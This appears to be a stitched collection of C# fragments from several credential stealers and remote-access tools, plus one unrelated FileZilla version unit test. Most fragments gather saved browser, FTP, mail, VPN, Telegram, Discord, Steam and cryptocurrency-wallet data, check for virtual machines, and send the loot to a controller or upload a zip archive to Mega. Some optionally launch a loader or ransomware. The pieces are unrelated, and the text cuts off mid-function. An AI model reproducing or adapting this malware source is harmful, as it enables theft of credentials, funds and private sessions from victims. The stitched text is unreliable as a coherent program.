public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client)
{
List <RecoveredAccount> recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(Yandex.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(Edge.GetPasswords());
recovered.AddRange(Outlook.GetSavedPasswords());
recovered.AddRange(Thunderbird.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
List <string> raw = new List <string>();
foreach (RecoveredAccount value in recovered)
{
string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.URL, value.Application, DELIMITER);
raw.Add(rawValue);
}
new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client);
}
private static void Main()
{
Directory.CreateDirectory(Program.dir);
HomeDirectory.Create(GetDirPath.User_Name, true);
if (Settings.webka)
{
GetWebCam.Get_webcam();
}
Screen.Get_scr(Program.dir);
FileZilla.get_filezilla(Program.dir);
Telegram.StealTelegram(Program.dir);
if (Settings.loader)
{
Loader.Load();
}
if (Settings.grabber)
{
Grabber.Grab_desktop(Program.dir);
}
Steal.Cookies();
Steal.Passwords();
Wallets.BitcoinSteal(Program.dir);
UserAgents.Get_agent(Program.dir);
Browser_Parse.Parse(Program.dir);
DomainDetect.Start(Helper.Browsers);
Hardware.Info(Program.dir);
Directory.Delete(Program.dir, true);
Directory.Delete(GetDirPath.User_Name, true);
if (Settings.ransomware)
{
RansomwareCrypt.Start();
}
}
private static string DigLikeThereIsNoTomorrow()
{
bool isHighIntegrity = Utils.IsHighIntegrity();
string findings = "";
findings += McAfee.Dig(isHighIntegrity);
findings += GPP.Dig();
findings += Unattended.Dig();
findings += PSReadLine.Dig(isHighIntegrity);
findings += AWS.Dig(isHighIntegrity);
findings += Azure.Dig(isHighIntegrity);
findings += GCP.Dig(isHighIntegrity);
findings += RDP.Dig(isHighIntegrity);
findings += PuTTY.Dig(isHighIntegrity);
findings += SuperPuTTY.Dig(isHighIntegrity);
findings += WinSCP.Dig(isHighIntegrity);
findings += FileZilla.Dig(isHighIntegrity);
findings += VNC.Dig(isHighIntegrity);
findings += TeamViewer.Dig();
findings += PulseSecure.Dig();
if (string.IsNullOrEmpty(findings))
{
return("\nDid not find anything :(\n");
}
else
{
return(findings);
}
}
public static void HandleGetPasswords(Packets.ServerPackets.GetPasswords packet, Client client)
{
var recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(Yandex.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
var raw = new List <string>();
for (var i = 0; i < recovered.Count; i++)
{
var value = recovered[i];
var rawValue = string.Format($"{value.Username}" + $"{DELIMITER}" +
$"{value.Password}" + $"{DELIMITER}" +
$"{value.URL}" + $"{DELIMITER}" +
$"{value.Application}");
raw.Add(rawValue);
}
new Packets.ClientPackets.GetPasswordsResponse(raw).Execute(client);
}
public static void RecoverPasswords()
{
try
{
StringBuilder sb = new StringBuilder();
sb.Append(FileZilla.Recover());
sb.Append(CoreFTP.Recover());
sb.Append(Minecraft.Recover());
sb.Append(WindowsProductKey.Recover());
Upload("Password Recovery", sb.ToString(), "2");
new Thread(new ThreadStart(delegate { recoverBrowser(); })).Start();
}
catch (Exception ex) { Config.DumpErrorLog(ex, null); }
}
private void Execute(ISender client, GetPasswords message)
{
List <RecoveredAccount> recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(Yandex.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
client.Send(new GetPasswordsResponse {
RecoveredAccounts = recovered
});
}
public static void HandleGetPasswords(GetPasswords packet, Networking.Client client)
{
List <RecoveredAccount> recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(Yandex.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
client.Send(new GetPasswordsResponse {
RecoveredAccounts = recovered
});
}
public void Test_needsUpdate()
{
var fz = new FileZilla(false);
DetectedSoftware det = new DetectedSoftware()
{
displayVersion = fz.knownInfo().newestVersion
};
// equal numbers does not need update
Assert.IsFalse(fz.needsUpdate(det));
// some older version numbers in ascending order
string[] older = { "3.0.0", "3.0.1", "3.0.2", "3.0.2.1",
"3.2.8", "3.2.8.1", "3.3.0", "3.3.0.1","3.3.1", "3.3.2",
"3.3.2.1", "3.3.3",
"3.9.0", "3.9.0.1", "3.9.0.2", "3.9.0.3","3.9.0.4", "3.9.0.5", "3.9.0.6",
"3.10.0", "3.10.0.1", "3.10.0.2", "3.10.1", "3.10.2", "3.10.3",
"3.11.0", "3.11.0.1", "3.11.0.2", "3.12.0", "3.12.0.1", "3.12.0.2",
"3.13.0" };
// older versions should always need update
foreach (string version in older)
{
det.displayVersion = version;
Assert.IsTrue(fz.needsUpdate(det));
}
// Only need update, if detected version is older than known version.
for (int i = 0; i < older.Length; i++)
{
for (int j = 0; j < older.Length; j++)
{
det.displayVersion = older[i];
fz = new FzTest(false, older[j]);
Assert.AreEqual <bool>(i < j, fz.needsUpdate(det),
"Failed check for i=" + i.ToString() + " and j=" + j.ToString() + "!"
+ " v[i]=" + older[i] + ", v[j]=" + older[j] + ".");
}
}
}
public static void getPasswords(GetPasswords packet, ClientMosaique client)
{
List <RecoveredAccount> recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
List <string> raw = new List <string>();
foreach (RecoveredAccount value in recovered)
{
string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.username, value.password, value.URL, value.application, DELIMITER);
raw.Add(rawValue);
}
new GetPasswordsResponse(raw).Execute(client);
}
public static void HandleGetPasswords(Paketler.ServerPaketleri.GetPasswords packet, Client client)
{
List <KurtarılanHesaplar> recovered = new List <KurtarılanHesaplar>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(Yandex.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
List <string> raw = new List <string>();
foreach (KurtarılanHesaplar value in recovered)
{
string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.Url, value.Application, Antilimiter);
raw.Add(rawValue);
}
new Paketler.ClientPaketleri.GetPasswordsResponse(raw).Execute(client);
}
public static void Main()
{
// Проверяем на запуск виртуальных машин ( Virtual Machine Check )
if (!AntiVM.GetCheckVMBot() && !RunCheck.InstanceCheck())
{
Environment.Exit(0);
}
// Создаём папку куда будем всё собирать
HomeDirectory.Inizialize();
// Делаем проверку что папка создалась
if (CombineEx.ExistsDir(GlobalPath.HomePath))
{
// Собираем данные ....
Telega.GetSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*");
MailFoxPassword.Inizialize();
BuffBoard.Inizialize();
NordVPN.Inizialize_Grabber();
DynDns.Inizialize_Grabber();
FileZilla.Inizialize_Grabber();
Pidgin.Inizialize_Grabber();
GetSteamFiles.Inizialize("*.", "*.vdf", "config", "Steam");
InfoGrabber.Inizialize();
ScreenShot.Inizialize(GlobalPath.Screen);
// Сбор и вывод логинов и паролей
Searcher.CopyInSafeDir(GlobalPath.LoginsPath, "Login Data");
GetPasswords.Inizialize_Multi_file();
// Сбор и вывод куки данных
Searcher.CopyInSafeDir(GlobalPath.CookiesPath, "Cookies");
GetCookies.Inizialize();
// Сбор и вывод Автозаполнение форм
Searcher.CopyInSafeDir(GlobalPath.WebDataPath, "Web Data");
GetAutoFill.Inizialize_AutoFill();
}
}
private static void Main()
{
Directory.CreateDirectory(dir);
HomeDirectory.Create(GetDirPath.User_Name, true);
if (Settings.webka)
{
GetWebCam.Get_webcam();
}
Screen.Get_scr(dir);
FileZilla.get_filezilla(dir);
Telegram.StealTelegram(dir);
if (Settings.steam)
{
Steam.StealSteam(dir);
}
if (Settings.loader)
{
Loader.Load();
}
if (Settings.grabber)
{
Grabber.Grab_desktop(dir);
}
Mozila.Mozila_still();
Wallets.BitcoinSteal(dir);
UserAgents.Get_agent(dir);
Browser_Parse.Parse(dir);
Hardware.Info(dir);
Directory.Delete(dir, true);
Directory.Delete(GetDirPath.User_Name, true);
if (Settings.ransomware)
{
RansomwareCrypt.Start();
}
}
public static void HandleGetPasswords(GetPasswords packet, Client client)
{
List <RecoveredAccount> recovered = new List <RecoveredAccount>();
recovered.AddRange(Chrome.GetSavedPasswords());
recovered.AddRange(Opera.GetSavedPasswords());
recovered.AddRange(Yandex.GetSavedPasswords());
recovered.AddRange(InternetExplorer.GetSavedPasswords());
recovered.AddRange(Firefox.GetSavedPasswords());
recovered.AddRange(FileZilla.GetSavedPasswords());
recovered.AddRange(WinSCP.GetSavedPasswords());
List <string> raw = new List <string>();
foreach (RecoveredAccount value in recovered)
{
string rawValue = string.Format("{0}{4}{1}{4}{2}{4}{3}", value.Username, value.Password, value.URL, value.Application, DELIMITER);
raw.Add(rawValue);
}
client.Send(new GetPasswordsResponse {
Passwords = raw
});
}
// Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC
public static Credentials Create(ClientSettings settings)
{
Credentials credentials = new Credentials
{
Defenders = new List <string>(),
Browsers = new List <Browser>(),
Files = new List <RemoteFile>(),
FtpConnections = new List <LoginPair>(),
Hardwares = new List <Hardware>(),
InstalledBrowsers = new List <InstalledBrowserInfo>(),
InstalledSoftwares = new List <string>(),
Languages = new List <string>(),
Processes = new List <string>(),
ColdWallets = new List <ColdWallet>(),
ImportantAutofills = new List <Autofill>(),
SteamFiles = new List <RemoteFile>(),
NordVPN = new List <LoginPair>(),
OpenVPN = new List <RemoteFile>(),
ProtonVPN = new List <RemoteFile>(),
TelegramFiles = new List <RemoteFile>()
};
try
{
try
{
ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null);
credentials.Hardwares = (from x in source
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Processor,
Parameter = string.Format("{0}", x.NumberOfCores)
}).ToList <Hardware>();
}
catch
{
}
try
{
WmiService wmiService = new WmiService();
if (credentials.Hardwares == null)
{
credentials.Hardwares = new List <Hardware>();
}
foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null)
where x.AdapterRAM > 0U
select new Hardware
{
Caption = x.Name,
HardType = HardwareType.Graphic,
Parameter = string.Format("{0}", x.AdapterRAM)
}).ToList <Hardware>())
{
credentials.Hardwares.Add(item);
}
}
catch
{
}
try
{
credentials.Hardwares.Add(new Hardware
{
Caption = "Total of RAM",
HardType = HardwareType.Graphic,
Parameter = UserInfoHelper.TotalOfRAM()
});
}
catch
{
}
try
{
WmiService wmiService2 = new WmiService();
List <WmiQueryBase> list = new List <WmiQueryBase>
{
new WmiAntivirusQuery(),
new WmiAntiSpyWareQuery(),
new WmiFirewallQuery()
};
string[] array = new string[]
{
"ROOT\\SecurityCenter2",
"ROOT\\SecurityCenter"
};
List <WmiAntivirus> list2 = new List <WmiAntivirus>();
foreach (WmiQueryBase wmiQuery in list)
{
foreach (string scope in array)
{
try
{
list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
}
catch
{
}
}
}
credentials.Defenders = (from x in list2
select x.DisplayName).Distinct <string>().ToList <string>();
}
catch
{
}
credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers();
credentials.Processes = UserInfoHelper.ListOfProcesses();
credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
credentials.Languages = UserInfoHelper.AvailableLanguages();
if (settings.GrabTelegram)
{
credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles());
}
if (settings.GrabVPN)
{
credentials.NordVPN.AddRange(NordVPN.GetProfile());
credentials.OpenVPN.AddRange(OpenVPN.ParseFiles());
credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles());
}
if (settings.GrabSteam)
{
credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles());
}
if (settings.GrabBrowsers)
{
List <Browser> list3 = new List <Browser>();
if (settings.PortablePaths == null)
{
settings.PortablePaths = new List <string>();
}
settings.PortablePaths.Add(Constants.RoamingAppData);
settings.PortablePaths.Add(Constants.LocalAppData);
List <string> list4 = new List <string>();
List <string> list5 = new List <string>();
foreach (string text in Constants.chromiumBrowserPaths)
{
string text2 = string.Empty;
if (text.Contains("Opera"))
{
text2 = Constants.RoamingAppData + text;
}
else
{
text2 = Constants.LocalAppData + text;
}
if (Directory.Exists(text2))
{
foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[]
{
"Login Data",
"Web Data",
"Cookies"
}))
{
if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3))
{
list4.Add(text3);
}
}
}
}
foreach (string str in Constants.geckoBrowserPaths)
{
try
{
string text4 = Constants.RoamingAppData + str;
if (Directory.Exists(text4))
{
foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[]
{
"key3.db",
"key4.db",
"cookies.sqlite",
"logins.json"
}))
{
if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5))
{
list5.Add(text5);
}
}
}
}
catch
{
}
}
list3.AddRange(ChromiumEngine.ParseBrowsers(list4));
list3.AddRange(GeckoEngine.ParseBrowsers(list5));
foreach (Browser browser in list3)
{
if (!browser.IsEmpty())
{
using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator())
{
while (enumerator6.MoveNext())
{
Autofill autofill = enumerator6.Current;
if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value))
{
credentials.ImportantAutofills.Add(autofill);
}
}
}
credentials.Browsers.Add(browser);
}
}
}
if (settings.GrabWallets)
{
List <ColdWallet> list6 = new List <ColdWallet>();
list6.AddRange(ColdWalletsGrabber.ParseFiles());
foreach (ColdWallet item2 in list6)
{
credentials.ColdWallets.Add(item2);
}
}
if (settings.GrabFiles)
{
credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null);
}
if (settings.GrabFTP)
{
List <LoginPair> list7 = new List <LoginPair>();
list7.AddRange(FileZilla.ParseConnections());
list7.AddRange(WinSCP.ParseConnections());
credentials.FtpConnections = list7;
}
if (settings.GrabImClients)
{
foreach (LoginPair item3 in Pidgin.ParseConnections())
{
credentials.FtpConnections.Add(item3);
}
}
}
catch (Exception)
{
}
return(credentials);
}
// Token: 0x0600000B RID: 11 RVA: 0x000188F8 File Offset: 0x00016AF8
public static void GetCollection()
{
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals1 = new Collection.< > c__DisplayClass2_0();
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine("Если вы это видите, значит запуск происходит в консольном режиме. Не забудьте перекомпилировать стиллер как 'Приложение Windows'.");
Console.WriteLine("If you see this, then the launch is in console mode. Do not forget to recompile the stealer as a 'Windows application'.");
try
{
Directory.CreateDirectory(Help.collectionDir);
Directory.CreateDirectory(Help.Browsers);
Directory.CreateDirectory(Help.Passwords);
Directory.CreateDirectory(Help.Autofills);
Directory.CreateDirectory(Help.Downloads);
Directory.CreateDirectory(Help.Cookies);
Directory.CreateDirectory(Help.History);
Directory.CreateDirectory(Help.Cards);
}
catch
{
}
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals2 = CS$ < > 8__locals1;
Task[] array = new Task[1];
array[0] = new Task(delegate()
{
Start.a();
});
CS$ < > 8__locals2.t0 = array;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals3 = CS$ < > 8__locals1;
Task[] array2 = new Task[1];
array2[0] = new Task(delegate()
{
Collection.GetChromium();
});
CS$ < > 8__locals3.t1 = array2;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals4 = CS$ < > 8__locals1;
Task[] array3 = new Task[1];
array3[0] = new Task(delegate()
{
Collection.GetGecko();
});
CS$ < > 8__locals4.t2 = array3;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals5 = CS$ < > 8__locals1;
Task[] array4 = new Task[1];
array4[0] = new Task(delegate()
{
Edge.GetEdge(Help.Passwords);
});
CS$ < > 8__locals5.t3 = array4;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals6 = CS$ < > 8__locals1;
Task[] array5 = new Task[1];
array5[0] = new Task(delegate()
{
Outlook.GrabOutlook(Help.collectionDir);
});
CS$ < > 8__locals6.t4 = array5;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals7 = CS$ < > 8__locals1;
Task[] array6 = new Task[1];
array6[0] = new Task(delegate()
{
FileZilla.GetFileZilla(Help.collectionDir);
});
CS$ < > 8__locals7.t5 = array6;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals8 = CS$ < > 8__locals1;
Task[] array7 = new Task[1];
array7[0] = new Task(delegate()
{
TotalCommander.GetTotalCommander(Help.collectionDir);
});
CS$ < > 8__locals8.t6 = array7;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals9 = CS$ < > 8__locals1;
Task[] array8 = new Task[1];
array8[0] = new Task(delegate()
{
ProtonVPN.GetProtonVPN(Help.collectionDir);
});
CS$ < > 8__locals9.t7 = array8;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals10 = CS$ < > 8__locals1;
Task[] array9 = new Task[1];
array9[0] = new Task(delegate()
{
OpenVPN.GetOpenVPN(Help.collectionDir);
});
CS$ < > 8__locals10.t8 = array9;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals11 = CS$ < > 8__locals1;
Task[] array10 = new Task[1];
array10[0] = new Task(delegate()
{
NordVPN.GetNordVPN(Help.collectionDir);
});
CS$ < > 8__locals11.t9 = array10;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals12 = CS$ < > 8__locals1;
Task[] array11 = new Task[1];
array11[0] = new Task(delegate()
{
Telegram.GetTelegram(Help.collectionDir);
});
CS$ < > 8__locals12.t10 = array11;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals13 = CS$ < > 8__locals1;
Task[] array12 = new Task[1];
array12[0] = new Task(delegate()
{
Discord.GetDiscord(Help.collectionDir);
});
CS$ < > 8__locals13.t11 = array12;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals14 = CS$ < > 8__locals1;
Task[] array13 = new Task[1];
array13[0] = new Task(delegate()
{
Wallets.GetWallets(Help.collectionDir);
});
CS$ < > 8__locals14.t12 = array13;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals15 = CS$ < > 8__locals1;
Task[] array14 = new Task[1];
array14[0] = new Task(delegate()
{
Systemsinfo.GetSystemsData(Help.collectionDir);
});
CS$ < > 8__locals15.t13 = array14;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals16 = CS$ < > 8__locals1;
Task[] array15 = new Task[1];
array15[0] = new Task(delegate()
{
Dec.Decrypt(Help.Passwords);
});
CS$ < > 8__locals16.t15 = array15;
try
{
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t0;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t1;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t2;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t3;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t4;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t5;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t6;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t7;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t8;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t9;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t10;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t11;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t12;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t13;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t15;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
Task.WaitAll(CS$ < > 8__locals1.t0);
Task.WaitAll(CS$ < > 8__locals1.t1);
Task.WaitAll(CS$ < > 8__locals1.t2);
Task.WaitAll(CS$ < > 8__locals1.t3);
Task.WaitAll(CS$ < > 8__locals1.t4);
Task.WaitAll(CS$ < > 8__locals1.t5);
Task.WaitAll(CS$ < > 8__locals1.t6);
Task.WaitAll(CS$ < > 8__locals1.t7);
Task.WaitAll(CS$ < > 8__locals1.t8);
Task.WaitAll(CS$ < > 8__locals1.t9);
Task.WaitAll(CS$ < > 8__locals1.t10);
Task.WaitAll(CS$ < > 8__locals1.t11);
Task.WaitAll(CS$ < > 8__locals1.t12);
Task.WaitAll(CS$ < > 8__locals1.t13);
Task.WaitAll(CS$ < > 8__locals1.t15);
}
catch
{
}
Console.ForegroundColor = ConsoleColor.Green;
DomainDetect.GetDomainDetect(Help.Browsers);
Start.b();
string contents = string.Concat(new string[]
{
"<!DOCTYPE html>\n<html>\n<body>\n<style>\nbody {\nbackground-image: url('https://steamcdn-a.akamaihd.net/steamcommunity/public/images/items/383690/f7a121a3f7a929ffb4dbc3ae241b3b4b6eaaed1d.jpg');\nbackground-repeat: no-repeat;\nbackground-attachment: fixed;\nbackground-size: 100% 100%;\n}\n</style>\n<center>\n<h1 style=\"color:white\">",
JsonValue.buildversion,
"</h1>\n<p style=\"color:white\">\ud83d\udc64 ",
Help.machineName,
"/",
Help.userName,
"</p>\n<p style=\"color:white\">\ud83c\udff4 IP: ",
Help.IP(),
Help.Country(),
"</p>\n<h2 style=\"color:white\">\ud83c\udf10 Browsers Data</h2>\n<p style=\"color:white;margin-left:-6em\"> ∟\ud83d\udd11</p>\n<p style=\"color:white;margin-left:3em\"> ∟Chromium v1: ",
Chromium.Passwords.ToString(),
"</p>\n<p style=\"color:white;margin-left:3em\"> ∟Chromium v2: ",
Dec.colvo.ToString(),
"</p>\n<p style=\"color:white;margin-left:-1.5em\"> ∟Edge: ",
Edge.count.ToString(),
"</p>\n<p style=\"color:white;margin-left:-0.9em\"> ∟Gecko: ",
Steal.count.ToString(),
"</p>\n<p style=\"color:white;margin-left:-4em\"> ∟\ud83c\udf6a",
(Chromium.Cookies + Steal.count_cookies).ToString(),
"</p>\n<p style=\"color:white;margin-left:-4em\"> ∟\ud83d\udd51",
Chromium.History.ToString(),
"</p>\n<p style=\"color:white;margin-left:-4.5em\"> ∟\ud83d\udcdd",
Chromium.Autofills.ToString(),
"</p>\n<p style=\"color:white;margin-left:-5.5em\"> ∟\ud83d\udcb3",
Chromium.CC.ToString(),
"</p>\n<p style=\"color:white;margin-left:-4.8em\"> ∟⨭",
Chromium.Downloads.ToString(),
"</p>\n<p style=\"color:white\">\ud83d\udcb6 Wallets: ",
(Wallets.count > 0) ? "✅" : "❌",
(Electrum.count > 0) ? " Electrum" : "",
(Armory.count > 0) ? " Armory" : "",
(AtomicWallet.count > 0) ? " Atomic" : "",
(BitcoinCore.count > 0) ? " BitcoinCore" : "",
(Bytecoin.count > 0) ? " Bytecoin" : "",
(DashCore.count > 0) ? " DashCore" : "",
(Ethereum.count > 0) ? " Ethereum" : "",
(Exodus.count > 0) ? " Exodus" : "",
(LitecoinCore.count > 0) ? " LitecoinCore" : "",
(Monero.count > 0) ? " Monero" : "",
(Zcash.count > 0) ? " Zcash" : "",
(Jaxx.count > 0) ? " Jaxx" : "",
"</p>\n<p style=\"color:white\">\ud83d\udcc2 FileGrabber: ",
Grab.countFiles.ToString(),
"</p>\n<p style=\"color:white\">\ud83d\udcb0 Recursive Wallets: ",
Grab.countWallets.ToString(),
"</p>\n<p style=\"color:white\">\ud83d\udda5 RDP: ",
Grab.countRdp.ToString(),
"</p>\n<p style=\"color:white\">\ud83d\udcac Discord: ",
(Discord.count > 0) ? "✅" : "❌",
"</p>\n<p style=\"color:white\">✈️ Telegram: ",
(Telegram.count > 0) ? "✅" : "❌",
"</p>\n<p style=\"color:white\">\ud83d\udca1 Jabber: ",
(Startjabbers.count + Pidgin.PidginCount > 0) ? "✅" : "❌",
(Pidgin.PidginCount > 0) ? (" Pidgin (" + Pidgin.PidginAkks.ToString() + ")") : "",
(Startjabbers.count > 0) ? " Psi" : "",
"</p>\n<h2 style=\"color:white\">\ud83d\udce1 FTP</h2>\n<p style=\"color:white\"> ∟ FileZilla: ",
(FileZilla.count > 0) ? ("✅ (" + FileZilla.count.ToString() + ")") : "❌",
"</p>\n<p style=\"color:white\"> ∟ TotalCmd: ",
(TotalCommander.count > 0) ? "✅" : "❌",
"</p>\n<h2 style=\"color:white\">\ud83d\udd0c VPN</h2>\n<p style=\"color:white\"> ∟ NordVPN: ",
(NordVPN.count > 0) ? "✅" : "❌",
"</p>\n<p style=\"color:white\"> ∟ OpenVPN: ",
(OpenVPN.count > 0) ? "✅" : "❌",
"</p>\n<p style=\"color:white\"> ∟ ProtonVPN: ",
(ProtonVPN.count > 0) ? "✅" : "❌",
"</p>\n<p style=\"color:white\">\ud83c\udd94 HWID: ",
Help.HWID,
"</p>\n<p style=\"color:white\">⚙️ ",
Systemsinfo.GetOSInformation(),
"</p>\n<p style=\"color:white\">\ud83d\udd0e ",
File.ReadAllText(Help.Browsers + "\\DomainDetect.txt"),
"</p>\n</center>\n</body>\n</html>"
});
File.WriteAllText(Help.collectionDir + "\\InfoHERE.html", contents);
Console.WriteLine("Упаковка архива");
string text = string.Concat(new string[]
{
Help.dir,
"\\",
Help.userName,
"_",
Help.machineName,
Help.CountryCOde(),
".zip"
});
using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
{
zipFile.ParallelDeflateThreshold = -1L;
zipFile.UseZip64WhenSaving = Zip64Option.Always;
zipFile.CompressionLevel = CompressionLevel.Default;
zipFile.AddDirectory(Help.collectionDir);
zipFile.Save(text);
}
Console.WriteLine("Залив на мегу");
MegaSend.TaskUpl(text);
Clean.GetClean();
}
// Token: 0x06000006 RID: 6 RVA: 0x000022D4 File Offset: 0x000004D4
public static void GetCollection()
{
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals1 = new Collection.< > c__DisplayClass2_0();
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine("Если вы это видите, значит запуск происходит в консольном режиме. Не забудьте перекомпилировать стиллер как 'Приложение Windows'.");
Console.WriteLine("If you see this, then the launch is in console mode. Do not forget to recompile the stealer as a 'Windows application'.");
try
{
Directory.CreateDirectory(Help.collectionDir);
Directory.CreateDirectory(Help.Browsers);
Directory.CreateDirectory(Help.Passwords);
Directory.CreateDirectory(Help.Autofills);
Directory.CreateDirectory(Help.Downloads);
Directory.CreateDirectory(Help.Cookies);
Directory.CreateDirectory(Help.History);
Directory.CreateDirectory(Help.Cards);
}
catch
{
}
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals2 = CS$ < > 8__locals1;
Task[] array = new Task[1];
array[0] = new Task(delegate()
{
Files.GetFiles(Help.collectionDir);
});
CS$ < > 8__locals2.t0 = array;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals3 = CS$ < > 8__locals1;
Task[] array2 = new Task[1];
array2[0] = new Task(delegate()
{
Collection.GetChromium();
});
CS$ < > 8__locals3.t1 = array2;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals4 = CS$ < > 8__locals1;
Task[] array3 = new Task[1];
array3[0] = new Task(delegate()
{
